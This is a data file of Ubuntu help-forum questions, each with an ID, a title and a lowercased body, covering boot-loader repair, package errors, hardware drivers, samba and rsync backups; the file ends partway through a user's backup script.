410637	problem with uget and flareget .	i am using uget ( with aria2 integration ) as my default download manager , but currently i have some problem with it . i downloaded a file which is 550mb , after download complete it is showing it is 580mb . anyway after that i try to use flareget , but unfortunately if do not allow download for a single file more then 2 segments . it actually slow my download speed a lot . guys can you provide me a internet download manager which have a graphical interface like flareget , or any other download manager which allow multiple segments for files .
410639	kubuntu 12.04 unable to edit /etc/default/grub.cfg	i have installed kubuntu on my thinkpad r31 . because of some issues with normal booting , i want to edit /etc/default/grub ( not.cfg , just cfg ) ( add i915.modeset=0 ) to defeault cmd line . when i try to save the file , i get a warning ( can not save a copy ) . i try to save the editted file anyway but with no succes ( error : not enough space or permissions ) . i have tried to edit the file with su permision , but did n't succeed . is there something i 'm missing and why i can not edit the file ? ( i can edit it , but not save it ) . how will i be able to edit the file and save it ?
410640	scrolling in firefox as in nautilus	i 'm using ubuntu 13.10 on a laptop . is it possible to make scrolling with touchpad behave the same way in firefox as it does in nautilus ? if you do n't know what i mean , it 's the scrolling without these steps . instead it seems to be pixel by pixel . can anyone help me with this ?
410641	ubuntu 13.10 : upgrade interrupted because of openjdk-7	i was running an apt-get upgrade ( not version upgrade , just normal ) , when i got this message : you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : icedtea-7-jre-jamvm : depends : openjdk-7-jre-headless ( = 7u51-2.4.4-0ubuntu0.13.10.1 ) openjdk-7-jre : depends : openjdk-7-jre-headless ( = 7u51-2.4.4-0ubuntu0.13.10.1 ) openjdk-7-jre-lib : breaks : openjdk-7-jre-headless ( < 7u45-2.4.3-1 ) e : unmet dependencies . try using -f. i then run as recommended `` apt-get install -f '' and here is the output : preparing to replace openjdk-7-jre-headless : amd64 7u25-2.3.12-4ubuntu3 ( using ... /openjdk-7-jre-headless_7u51-2.4.4-0ubuntu0.13.10.1_amd64.deb ) ... unpacking replacement openjdk-7-jre-headless : amd64 ... dpkg : error processing /var/cache/apt/archives/openjdk-7-jre-headless_7u51-2.4.4-0ubuntu0.13.10.1_amd64.deb ( -- unpack ) : trying to overwrite shared '/etc/java-7-openjdk/sound.properties ' , which is different from other instances of package openjdk-7-jre-headless : amd64 errors were encountered while processing : /var/cache/apt/archives/openjdk-7-jre-headless_7u51-2.4.4-0ubuntu0.13.10.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i fix this error ? thanks update : the 1st time , i ran the command , there was no output . now , running it again , i get : dpkg : dependency problems prevent removal of openjdk-7-jre-headless : amd64 : icedtea-7-jre-jamvm : amd64 depends on openjdk-7-jre-headless ( = 7u51-2.4.4-0ubuntu0.13.10.1 ) . dpkg : error processing openjdk-7-jre-headless : amd64 ( -- remove ) : dependency problems - not removing errors were encountered while processing : openjdk-7-jre-headless : amd64
410642	i was running windows 7 , i installed ubuntu and now am unable to access windows	i was running windows 7 , i installed ubuntu and now am unable to access windows . am had important data in windows drives , am not able to access them either ! ! ! please help
410646	ubuntu version for old macintosh computers	i have several old macintosh computers such as , lc475 , mac 2 or mac ll , g3 , quadra 605 , performa 6220cd , macintosh 8100 ? also , if you can match up your system version , what vrowser will work with your system version for any of the above macintosh computers ? thanks in advance , george
410647	broke ubuntu with the windows disk management tool	i initially had 3 partitions : -windows 7 -ubuntu -data ( no os ) i had grub2 as a boot loader . i used the default windows disk management tool to shrink my data partition and install windows 8 . after shrinking my data partition and creating a new one , i restarted my computer and i got an error message telling me that it encountered an error ( grub did n't even start ) . so i installed windows 8 , and i can now dual boot 7 and 8 with the windows 8 boot loader . in the windows disk management tool i see that the ubuntu partitions are 100 % free , which is odd , since i only formatted the new partition . what did i do wrong ? was i supposed to create the partition using gparted ? i now want to install ubuntu again . is there a chance that now i 'll somehow erase my windows partition by accident ? i assume grub will automatically install again , so is it compatible with windows 8 ?
410652	ubuntu is n't playing music or videos , no sound or visuals	ubuntu is n't playing music or videos , no sound or visuals . i have no sound or video playing . it 's playing ogg . none of the things that worked in windows is working here .
410653	should i get rid of these packages or should i not ?	i am pretty new to ubuntu . recently , i had some problems with skype . so i uninstalled/re-installed it . and the problem was solved . i also decided to get rid of the little message/mail indicator on top because i did not want/need it . i followed the command information i found on the forum . and the indicator went away . so far so good . then i pressed apt-get autoremove and got the following : alan @ alan-latitude-d530 : ~ $ sudo apt-get autoremove [ sudo ] password for alan : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : libaudio2 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libcups2 : i386 libdatrie1 : i386 libdbusmenu-qt2 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcrypt11 : i386 libgnutls26 : i386 libgpg-error0 : i386 libgssapi-krb5-2 : i386 libice6 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 liblcms1 : i386 libmng1 : i386 libmysqlclient18 : i386 libp11-kit0 : i386 libqt4-dbus : i386 libqt4-declarative : i386 libqt4-network : i386 libqt4-script : i386 libqt4-sql : i386 libqt4-sql-mysql : i386 libqt4-xml : i386 libqt4-xmlpatterns : i386 libqtcore4 : i386 libqtgui4 : i386 libqtwebkit4 : i386 libsm6 : i386 libsqlite3-0 : i386 libtasn1-3 : i386 libthai0 : i386 libtiff4 : i386 libxi6 : i386 libxrender1 : i386 libxss1 : i386 libxt6 : i386 libxv1 : i386 mysql-common skype-bin : i386 sni-qt : i386 0 upgraded , 0 newly installed , 48 to remove and 0 not upgraded . after this operation , 118 mb disk space will be freed . do you want to continue [ y/n ] ? this was also confirmed at ubuntu tweak janitor , where it says i have 48 unneeded , unnecessary packages that can/should be removed . it also has a small red circle before this ! ! this sure looks like a beware/warning sign to me ! ! ! my question is : should i get rid of this stuff or did i press a wrong button somewhere , in which case , if i get rid of this stuff will my computer crash and burn ! this has happened before ! ! ! should i worry or is everything ok and i can remove this stuff . to do or not to do : that is the question ! if it is really dangerous to eliminate this stuff , then how would i fix ubuntu teak janitor and autoremove at the terminal so i do n't get these messages ?
410654	corrupted hd recovery , non-pae machine	i was trying to fix a corrupt hard drive i was given information on trying to recover the files on a failed drive by getting ubuntu and looking around . my laptop is awaiting a new drive so i only have an old xp desktop and the newer versions of ubuntu wo n't work . i had to install ubuntu 8.4 . i put the disk in , and originally ticked the try but not install option . while looking around , i hit the install button and even though i cancelled the operation ( once i realized that it was n't a good idea ) a partition was still created which i did n't find out until i turned the computer on this morning . i got the `` master boot record error - insert system disk press enter '' message instead of the xp boot i expected . i reinserted the ubuntu disk and saw the partition . i do n't know how to get back to xp . i 've been reading the message boards and see grub used to access partitions ( if i understood that correctly ) . i downloaded it but do n't have a clue where to go from here .
410655	how can i run the program combat manager in ubuntu	i 've got a program i used on my old windows pc called combat manager . it uses microsoft.net framework . i 've to install it with both wine and playon linux and get errors either way . i saw that mono was one way to run programs that use .net framework but ca n't figure out how to do it . can anyone perhaps help me install and run this program ? running ubuntu on a compaq 6720s
410661	boot-repair does not add widnows 7 to the grub menu	i have a laptop with debian 7 , windows 7 and ubuntu 13.04 . i have decided to upgrade to ubuntu 13.10 , and installed the ubuntu partition afresh . after the re-installation , windows 7 disappeared from the grub menu . i booted the machine with a live cd and started boot-repair . boot-repair seemed to have identified the installed os 's well , including the windows partition : ... sda5 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99-2.00 ) boot sector info : grub2 ( v1.99-2.00 ) is installed in the boot sector of sda5 and looks at sector 817082808 of the same hard drive for core.img , but core.img can not be found at this location . operating system : ubuntu 13.10 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/i386-pc/core.img ... and the installation went well without errors : grub-install ( grub ) 2.00-19ubuntu2.1 , grub-install ( grub ) 2 . reinstall the grub of sda5 into the mbr of sda installation finished . no error reported . grub-install /dev/sda : exit code of grub-install /dev/sda:0 chroot /mnt/boot-sav/sda5 update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-15-generic found initrd image : /boot/initrd.img-3.11.0-15-generic found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found debian gnu/linux ( 7.0 ) on /dev/sda6 unhide grub boot menu in sda5/boot/grub/grub.cfg boot successfully repaired . you can now reboot your computer . the full report is available here . still , after reboot i only see the ubuntu and debian records in grub , without the windows 7 section : any idea what 's wrong with the boot-repair fix attempt ?
410662	libreoffice bibliography from written entries	i wanted to help my girlfriend format her thesis . unfortunately , she simply wrote out her bibliography and so you have to keep the references and order right all by manually . is there a way to import/convert this to in-document bibliography entries or entries in the bibliography database . so that i can simply generate and automatic bibliography ? at first , i thought i could simply parse the text into a bibtex format . but i do n't see a way to import bibtex into libreoffice .
410664	computer crashes after installing gnome 3.10 ( 13.10 )	i 've tried to install gnome3 about 4 times and each time the same thing happens . the computer screen goes black and nothing happens , and after i force restart the computer it boots up with the gnome screen but the mouse icon is gone . then i 'm forced to boot up with a usb drive and reinstall ubuntu . i 'm on 13.10 i used this method install gnome 3.10 in ubuntu 13.10 without breaking unity but after the very last step there are no error messages or anything but the screen just goes black .
410665	is it ok if rc.local calls script with infinite loop ? and some rc.local basics	i 'm running 12.04 , and i 've never really messed with rc.local . first , when i source myscript.sh in rc.local , should it be /path/to/myscript.sh or sh /path/to/myscript.h or does it even matter ? can it be bash -c `` /path/to/myscript.sh '' ? second , it is my understanding that during startup , my script will be called with myscript.sh start and during shutdown myscript.sh stop . is that correct ? last , if myscript.sh has an infinite loop , will it hang the startup of the machine ? ( it is n't truly an infinite loop because myscript.sh stop will stop it gracefully ) when i run the script from terminal , i use the command myscript.sh start & . can rc.local do the same or similar ? right now i have a shell script that accomplishes the same goal but has a true infinite loop and is sourced from .gnomerc . i 'm trying to make it a little less `` hacky '' . thanks .
410669	does ubuntu install drivers automatically ?	i want to upgrade to ubuntu 13.04 from windows 7 . will ubuntu automatically install drivers by downloading them from the internet ?
410670	openstack havana network creation	when i run the command : nova network-create vmnet -- fixed-range-v4=10.0.0.0/24 -- bridge-interface=br100 -- multi-host=t i get the error : error : the server has either erred or is incapable of performing the requested operation . ( http 500 ) ( request-id : req-f981271e-deae-4cb5-b118-d20d6301a295 ) what am i doing wrong ?
410678	i install ubuntu 13.10 but the pc ca n't start up ubuntu it start with windows	i install ubuntu 13.10 but the pc ca n't start up ubuntu it start with windows .is there anything i should instal or do ?
410679	does one of these cards support packet injection ?	do either of these wireless cards support packet injection : qualcomm atheros ar8151 airlink101 awll3055 also , which drives should i install for them to work properly ( i 'm using ubuntu 12.04 lts x64 ) . i have browsing around the internet , but i did n't find the answer . thanks
410680	setting up network ( samba ) share on two kubuntus	i have a kubuntu desktop pc and a kubuntu server . using krdc , i can remotely connect from my desktop to my server , and that is great . however , i want to use my server to backup my data and it sounds like samba is the easiest way to do that . ironically , i can use samba to connect to my work 's windows 7 laptop no questions asked . however there seems to be a problem ( bug ? ) when i connect the desktop and server together . to test samba i am sharing the `` public '' folder in my home directory on both my desktop and server . on either computer , in dolphin if i do `` smb : //localhost/public '' , a prompt pops up that says `` please enter authentication information for : server = localhost share = public '' . i have no clue what this means . assuming it is asking for authentication , no username/password combinations work . i 've even tried creating a dedicated samba user and still , nothing . the configuration in my smb.conf file are as follows : [ public ] path = /home/brian/public writeable = yes ; browseable = yes guest ok = yes i am floored at how difficult it is to simply share a folder across a home network on kubuntu . why is it so difficult ? i literally just installed the operating systems last night and followed the kde instructions and this is where it takes me . what can i do from here ?
410684	netgear n300 wireless usb adapter not recognized	i recently installed ubuntu 13.10 on my desktop computer and was using a netgear n300 wireless usb adapter . the computer does not recognize adapter nor the software that came with it .
410687	vuze azbuddy ( friends ) plugin issues	my vuze plugins menu from the application menu does not open . should it* ? * i 'd like to utilize the friends plugin . it is enabled , unloaded ( green ) and shows version 1.0 in tools/options/plugins . i do not have an azbuddy folder under ~home/.azereus/plugins/ and do not see an installer or source package available here : http : //plugins.vuze.com/plugin_list.php . i 've looked for hours through the vuze wiki and forum where there is not much dedicated to linux . i 've tried enough random bits of troubleshooting from forums that a restart changes views or causes the main windows to show up blank , while i can still access the application menus . a sudo apt-get remove vuze and sudo apt-get install vuze did not work . apparently there are several configuration files that would need to be removed to give it a fresh install . does anyone know where all of them are* ? * are there any special instructions or order* ? * i like the idea of a private torrent share with friends . does transmission have that capability* ? * i 'm posting this in the vuze forum with title : ubuntu azbuddy ( friends ) plugin issues .
410690	ca n't see windows 8 in grub after installing ubuntu	let me preface by saying i 'm new to this whole scene of installing a second os on a partition , as well as operating and navigating ubuntu , so i need the simplest explanations you can offer . i just did a fresh install of windows 8 on my computer , then installed ubuntu on a partition of the hard drive . after installing ubuntu , the grub menu will properly open upon computer startup , but win8 is nowhere to be found . in fact , after this install the only things that were displayed in grub were the same as before the ubuntu install ( try ubuntu , install ubuntu , and whatever the third option was ) . thoroughly confused , i selected install ubuntu again . but this time i installed using the `` alongside '' option , which previously was n't an option . i split the hard drive space in half pretty much , thinking this was more of a means of making windows available alongside ubuntu , but no . it installed ubuntu again . not sure where the second copy is relative to the first . but anyway , when i restart the computer now , grub loads with two different options to open ubuntu , along with some other junk , but still no win8 startup option . i can navigate in ubuntu to one of the two halves i created during the alongside installation , and can see that it 's my windows files , but have no idea how to launch windows . needless to say , this is a huge problem for me . so now i have two problems : 1 ) how can i make windows 8 a boot option in the grub menu , and 2 ) how can i undo/delete the extraneous install of ubuntu ? any help is greatly appreciated . like i said before , i will probably need more detailed explanation than an experienced user : ) thanks !
410692	how to restart python script after one second of going down using upstart ?	i am running my python script using upstart feature of ubuntu so that if for whatever reason my python script dies or gets killed , it can be restarted automatically and everything is working fine - so i decided to use upstart feature of ubuntu to restart the python script automatically . after creating the testing.conf file like this in /etc/init/testing.conf - start on runlevel [ 2345 ] stop on runlevel [ 016 ] chdir /tekooz exec python testing.py respawn i ran below sudo command to start it and i can see that process running using ps ax and my python script is also running fine . root @ bx13 : /tekooz # sudo start testing testing start/running , process 27794 now if i kill the pid of the above process , then it get restarted automatically within few milliseconds or microseconds . is there any possibility of restarting my python script after 1 second if it has gone down or got killed ? i do n't want to restart immediately .
410694	how can i manually change the mouse/pointer speed ?	i have an apple magic mouse , and it 's almost unusable since the sensitivity is too high . yet in the mouse/touchpad settings , the pointer speed is set to the slowest possible setting . is there a way to manually change this setting so that it 's much slower than the slowest setting ?
410695	wireless card unclaimed by driver , not working	so , my wireless card is reporting all feature correctly , but remained unclaimed by the driver . someone suggested that it could be a pci controller issue . any ideas where to start . lscpi -v below . 05:00.0 network controller : atheros communications inc. ar9300 wireless lan adaptor ( rev 01 ) subsystem : atheros communications inc. device 3116 flags : fast devsel , irq 19 memory at f7100000 ( 64-bit , non-prefetchable ) [ size=128k ] expansion rom at f7120000 [ disabled ] [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/4 maskable+ 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 300 ] device serial number 00-00-00-00-00-00-00-00
410696	image preview from remote drive	i have set up a remote drive for storing my photos . i connect to the drive using `` connect to server '' in nautilus . this works pretty well and even the preview images are loaded if i edit the nautilus settings to show the preview always . it just is pretty slow to get the previews so i thought if there is way to generate the preview image on the remote drive and make nautilus to show that instead of downloading the whole image and then self generating the preview ?
410697	after installing ubuntu , i can not boot to windows	i recently installed ubuntu using wubi from the main page on my windows 8.1/windows 7 system . after the installation finished , my computer booted directly into ubuntu , not giving me a chance to get into windows . how can i insert a boot loader to select whether to boot to windows or ubuntu ?
410700	ca n't install virt-manager	when i try to install via terminal using : sudo apt-get install virt-manager i get this message : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package virt-manager i 'm using ubuntu 13.04 64bits main and universe packages are allowed .
410701	ubuntu 12.04.4 server fails to update packages	for more than a week , i have had a problem installing updates for my ubuntu server . from what i can see , it seems to think that there is a storage issue , but there is more than 100 gigs left on the hard drive . i will put one of the error messages i have received down below . i apologize if i did n't do things quite right , this if my first time posting here . i am also quite new to ubuntu , so i am still learning . installarchives ( ) failed : ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 574059 files and directories currently installed . ) preparing to replace liblcms2-2 2.2+git20110628-2ubuntu3.1 ( using ... /liblcms2-2_2.4-0ubuntu3.1~precise1~ppa1_i386.deb ) ... unpacking replacement liblcms2-2 ... setting up initramfs-tools ( 0.99ubuntu13.4 ) ... update-initramfs : deferring update ( trigger activated ) setting up liblcms2-2 ( 2.4-0ubuntu3.1~precise1~ppa1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-45-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.5.0-45-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 processing triggers for libc-bin ... no apport report written because maxreports is reached already ldconfig deferred processing now taking place errors were encountered while processing : initramfs-tools error in function : setting up initramfs-tools ( 0.99ubuntu13.4 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-45-generic gzip : stdout : no space left on device cpio : write error : broken pipe e : mkinitramfs failure cpio 1 gzip 1 update-initramfs : failed for /boot/initrd.img-3.5.0-45-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1
410703	change right click behavior for touchpad	i have a new lenovo t440p ( which has an apple-like clickpad ) and in windows , the touchpad behaves as i want it to , the entire surface behaves the same when clicked , and to right click , i click with two fingers . on linux , however , when i click on the bottom right portion of the touchpad , it registers as a right click , which i do not like . i have looked in the synaptics configuration gui but could n't find an option to change this behaviour . am i missing something or is there some other way to achieve the desired behaviour ?
410705	qt-x11-free on ubuntu 12.10	does any one now how to install qt-x11-free library on ubuntu 12.10 , i coud n't find the ppa file and neither the description of where to unzip the tar.gz package files that i found on launchpad https : //launchpad.net/ubuntu/+source/qt-x11-free/3:3.3.8-b-8ubuntu3 also i 'm a bit confused since there is no library for my ubuntu verion only one for precise pangolin please help me .
410707	windows 8 + ubuntu 13.10 + boot-repair stuck	i bought a laptop hp envy premium with windows 8 on it . i wanted to install also ubuntu 13.10 on it . i partitioned from windows the disk creating space for linux . then booting from a live ubuntu on a usb stick i installed on that space ubuntu . now i at the boot only windows 8 is executed and grub does't appear . so i rebooted from live usb i installed boot-repair in order to run it . the problem now is that boot repair gets stuck in the initial phase . in particular in the phase when it 's running os-prober . here is some info maybe useful obtained running boot-repair with '-d ' : http : //pastebin.ubuntu.com/6816377/ . thanks in advance ! gp .
410708	install win7 after ubuntu 13.10 ( dual boot )	i 'm running ubuntu 13.10 and would like to set up a dual boot configuration with windows 7 . how can i do this ?
410712	script to add multiple users in ubuntu ( bulk )	i need to add 10 users by a script in ubuntu 12.04 . that could reduces time by adding users manually , and i can apply this script on other desktop . each user will has a specific user and in specific group . any idea ?
410714	canât install the 64bit version ubuntu 13.10	i am trying install 64bit version of ubuntu 13.10 as the only operating system on a system with a amd fx-8320 cpu , a ga-990fxa-ud3 motherboard , and 32gbytes of memory . i can get ubuntu to start the installation , but when it gets to the first decision page neither the keyboard or mouse work so , i can not input anything to go further . i am able to install the 32bit version of 13.10 on the system and it does work . why doesnât the 64bit version of 13.10 install ?
410715	how do i install gnome 3.10 in ubuntu 13.10	is this possible , or do i need to wait for ubuntu 14.04 ? please help
410718	check cd , disk for defect option	let 's say that i want to make a test . and i try to download and burn iso of ubuntu on win7 that have avast anti virus , and that pc is maybe illegally activated ... what will happen ? will it check cd , disk for defect option work and really check state of media ( check is it the live cd as it should be ) ? i wonder what will happen if we have any unofficial change in ubuntu live disk ( viruses , errors etc ) , will it `` check cd/disk for defect `` see as error and os will not be able to install from cd ? or this option only check state of physical mistakes but not the data on that media or it check both ! ? could it that copy of ubuntu still be good and official or it is corrupted ... please do not delete part of post , all this is hypothetical question ...
410721	new user - installing .jar file difficulty	new ubuntu user - trying to download and install a file ... in this case a .jar file ... and having difficulty knowing where to install it . i have used software center to install .exe files , and it is so easy and nice . but the .jar is not handled the same way for some reason ... maybe because it requires java ? what is the easiest/most direct way to download and install a file in ubuntu when software center is not handling it for you ?
410722	problems installing on hp n096sa laptop	i have tried installing ubuntu with efi and also with it disabled . the live disk opens with a black screen giving options . ( this screen is supposed to indicate efi boot ) when you choose install ubuntu or try ubuntu , the disk spins and the screen just turns black . i have read around on this site and all suggestions seem to revolve around ubuntu actually installing . i have searched this under `` could not open efi\boot\efi fallback.efi14 error variable root is n't set '' answers to this were unhelpful since the suggestions all seemed to assume that ubuntu was installing . since it is n't installing i can not use the terminal .
410724	ubuntu 13.10 ca n't shutdown	i recently installed ubuntu 13.10 on my lenovo thinkpad s431 , but it ca n't shutdown . any kind of shutdown only restarts the laptop . i 've tried all sorts of things from re-installing ubuntu to shutting down from the terminal . i 've read many discussions about this issue , but i ca n't find a solution . any advice would be great . thanks !
410725	swap , zram , cpu , memory & software center	this is a shot of my swapfiles and system monitor : and i would like to know what is the best way to reconfigure my swaps . below is the result on my terminal : harayz @ asus : ~ $ cat /proc/swaps filename type size used priority /dev/zram0 partition 895624 0 100 /dev/sda2 partition 5118972 0 -1 /swapfile file 524284 0 -2 /dev/zram1 partition 895624 0 100 since i experimented with the swap setting , my cpu have been acting up and the system monitor indicated high memory usage and low swappiness . how do i reconfigure my swap and make it lower because i think 7gb is tad too much . can someone tell me why is my memory load taking up too much of my processing capacity when to my knowledge only regular non-server tasks are running in the background ? could it be some unknown daemon or leakage that that i can find out but if so - how ? i am using ubuntu 12.04 lts amd64 with 2gb ram on an asus laptop . please let me know if i am missing any necessary information . thank you so very much and i sincerely appreciate your feedback .
410727	ubuntu does not appear in grub menu . boot repair failed	i have a hard-drive with windows 7 and ubuntu . until a few days ago i was using ubuntu 12.10 but after a lot of crashes errors and broken packages ubuntu stopped booting at all . with a live dvd i installed ubuntu 13.04 without problems but after some updates that required a reboot the system booted directly to a black screen with the text `` grub recovery > '' . i ran boot repair and afterwards i was able to access windows 7 but if i select ubuntu the grub menu just shows `` windows recovery '' and `` windows boot loader '' . this is the link with the information from boot repair . http : //paste.ubuntu.com/6815487 hopefully someone can help me , because i really have no clue on how to access the files from ubuntu 13.04 . the files from ubuntu 12.10 were available trough boot repair as a mounted disk in a trial version of ubuntu , but the installation of 13.10 was not detected .
410728	hp g72 ubuntu 12.10 - wireless broken	i 've had this hp g72 notebook for about a year now . yesterday i installed ubuntu on it . ( 12.04 , but it installed 12.10 ) when i had the install disc in the computer when i clicked try ubuntu and whilst it was installing , the wifi worked fine . now that i do n't have the disc in , it does n't even show any networks to connect to . i 've tried looking around for fixes but everything is for older ubuntu versions and do n't seem to work . output of lspci | grep -i network : 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 )
410730	.desktop file wo n't work for code composer studio	i 'm trying to get my .desktop file for my application code composer studio to work so i can have a shortcut . when i click on the .desktop icon , i get an error saying `` there was an error launching the application '' . typing in the terminal command : more code composer studio 5.5.0-desktop.desktop yields : [ desktop entry ] version=1.0 type=application name=code composer studio 5.5.0 exec=/opt/ti/ccsv5/eclipse/ccstudio icon=/opt/ti/ccsv5/doc/eclipse-ccs-2.ico i 'm not really familar with desktop files so i 'm not sure what the problem is . however , going to /opt/ti/ccsv5/eclipse/ccstudio will launch the program fine . the icon on the desktop has a lock in front of it so i tried changing the permissions and launching in the terminal but that did n't help . i 'm running ubuntu 12.04 on a virtualbox if that means anything . thanks ! edit : ls -half /opt/ti/ccsv5/eclipse/ccstudio* gets : -rwxr-xr-x 1 root root 65k apr 12 2013 putting : /opt/ti/ccsv5/eclipse/ccstudio launches the program and outputs this about 50 times : `menu_proxy_module_load ' : /opt/ti/ccsv5/eclipse/ccstudio : undefined symbol : menu_proxy_module_load
410732	xconfig not working	i tried to install nvidia driver and it did n't wrked . i tried all wersions from the ubuntu software center and i downloaded one from the nvidia site too . ewery time i created the xconfig file and i rebooted the computer . it seems that it ignores the xconfig file .
410733	remove icon from the toolbar	basic specs - ubuntu 13.10 , gnome 3 ( session fallback ) , ambiance theme , faenza icons . i tried to drag and drop transmission icon to place it in the desktop and it appeared on the top toolbar instead and i do n't know how to remove it .
410735	help with rsync excludes not working	i 'm trying to setup rsync to keep an image on the my external drive current . i 've got 4 partitions to deal with : / , /boot , /home , /usr . i want to mount each one in turn and sync each with the internal drive . one problem i 'm having is that excluded files are not being excluded . i 've experimented with a few patterns but none do the trick . i 'm setting the exclude pattern relative to the source but it 's not working . this log snippet of the /home/ sync shows the excluded files being copied : -- begin snippet -- backing up /home/ via rsync to : /media/ubuntu_backup ... sudo rsync -a -x -i -h -v -a -x -h -- delete -- inplace -- numeric-ids -- compare-dest=./ -n -- exclude='*/lost+found/** ' -- exclude='*/downloads/** ' -- exclude='*/.cache/** ' -- exclude='*/.thumbnails ' -- exclude='*/.mozilla/firefox/*.default/cache ' /home/ /media/ubuntu_backup sending incremental file list .d..t ... ... kmiller/ > f..t ... ... kmiller/.vim_mru_files > f.st ... ... kmiller/.viminfo > f.st ... ... kmiller/.zsh_history > f.st ... ... kmiller/backup.log > f.st ... ... kmiller/cron.log .d..t ... ... kmiller/.cache/google-chrome-beta/default/cache/ *deleting kmiller/.cache/google-chrome-beta/default/cache/f_000806 > f..t ... ... kmiller/.cache/google-chrome-beta/default/cache/data_0 > f..t ... ... kmiller/.cache/google-chrome-beta/default/cache/data_1 > f..t ... ... kmiller/.cache/google-chrome-beta/default/cache/data_2 > f..t ... ... kmiller/.cache/google-chrome-beta/default/cache/data_3 > f+++++++++ kmiller/.cache/google-chrome-beta/default/cache/f_00080a > f+++++++++ kmiller/.cache/google-chrome-beta/default/cache/f_00080b > f+++++++++ kmiller/.cache/google-chrome-beta/default/cache/f_00080c > f+++++++++ kmiller/.cache/google-chrome-beta/default/cache/f_00080d > f+++++++++ kmiller/.cache/google-chrome-beta/default/cache/f_00080e -- end of snippet -- the other problem i was having is that rsync was creating a duplcate directory structure within the target dir i.e . a /usr/ dir inside the /usr on the target . the -- compare-dest=./ seemed to stop that but i do n't fully understand why . this is the script i 'm developing to do the job : # ! /usr/bin/zsh typeset -a filesystems typeset -a names mountpoint='/media/ubuntu_backup' logfile='/home/kmiller/backup.log' options= ( '-a ' ) # archive options+= ( '-x ' ) # do n't cross file system boundaries options+= ( '-i ' ) # itemize changes options+= ( '-h ' ) # human readable output options+= ( '-v ' ) # verbose options+= ( '-a ' ) # preserve acls options+= ( '-x ' ) # preserve extended attributes options+= ( '-h ' ) # preserve hard links options+= ( ' -- delete ' ) # delete extraneous options+= ( ' -- inplace ' ) # update files directly ( faster - no building temp copies ) options+= ( ' -- numeric-ids ' ) # no translation of uid , gid - needed for proper restores options+= ( ' -- compare-dest=./ ' ) # options+= ( '-n ' ) # dry run filesystems= ( '/ ' '/dev/sdb6 ' ) filesystems+= ( '/boot/ ' '/dev/sdb1 ' ) filesystems+= ( '/usr/ ' '/dev/sdb8 ' ) filesystems+= ( '/home/ ' '/dev/sdb7 ' ) rootexcludes= ( `` -- exclude='boot/* ' '' ) rootexcludes+= ( `` -- exclude='usr/* ' '' ) rootexcludes+= ( `` -- exclude='home/* ' '' ) rootexcludes+= ( `` -- exclude='dev/* ' '' ) rootexcludes+= ( `` -- exclude='proc/* ' '' ) rootexcludes+= ( `` -- exclude='sys/* ' '' ) rootexcludes+= ( `` -- exclude='tmp/* ' '' ) rootexcludes+= ( `` -- exclude='run/* ' '' ) rootexcludes+= ( `` -- exclude='mnt/* ' '' ) rootexcludes+= ( `` -- exclude='media/* ' '' ) rootexcludes+= ( `` -- exclude='lost+found/* ' '' ) rootexcludes+= ( `` -- exclude='etc/fstab ' '' ) bootexcludes= ( `` -- exclude='lost+found/* ' '' ) bootexcludes+= ( `` -- exclude='grub/grub.cfg ' '' ) usrexcludes= ( `` -- exclude='lost+found/* ' '' ) homeexcludes= ( `` -- exclude='*/lost+found/* ' '' ) homeexcludes+= ( `` -- exclude='*/downloads/* ' '' ) homeexcludes+= ( `` -- exclude='*/.cache ' '' ) homeexcludes+= ( `` -- exclude='*/.thumbnails ' '' ) names= ( '/ ' 'root ' '/boot/ ' 'boot ' '/usr/ ' 'usr ' '/home/ ' 'home ' ) is_mounted ( ) { mount | grep `` $ 1 '' || return 1 return 0 } if [ [ ! -d $ mountpoint ] ] ; then echo `` creating $ mountpoint ... '' sudo mkdir $ mountpoint || { echo `` $ 0 failed - problem creating mount dir : $ mountpoint '' & & exit ; } fi rm -rf $ logfile # unmount any target backup partitons if they happen to be mounted for fs in $ { ( k ) filesystems } ; do if is_mounted $ { filesystems [ $ fs ] } ; then sudo umount $ { filesystems [ $ fs ] } || { echo `` $ 0 - problem unmounting : $ mountpoint '' & & exit ; } fi done echo -e `` \nstarting partition backups ... '' for fs in $ { ( k ) filesystems } ; do excludes= $ ( eval echo \ $ $ { names [ $ { fs } ] } excludes ) echo `` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - '' echo `` mounting $ { fs } partition : $ { filesystems [ $ fs ] } ... '' sudo mount $ { filesystems [ $ fs ] } $ mountpoint || { echo `` $ 0 - problem mounting : $ { filesystems [ $ fs ] } $ mountpoint '' & & 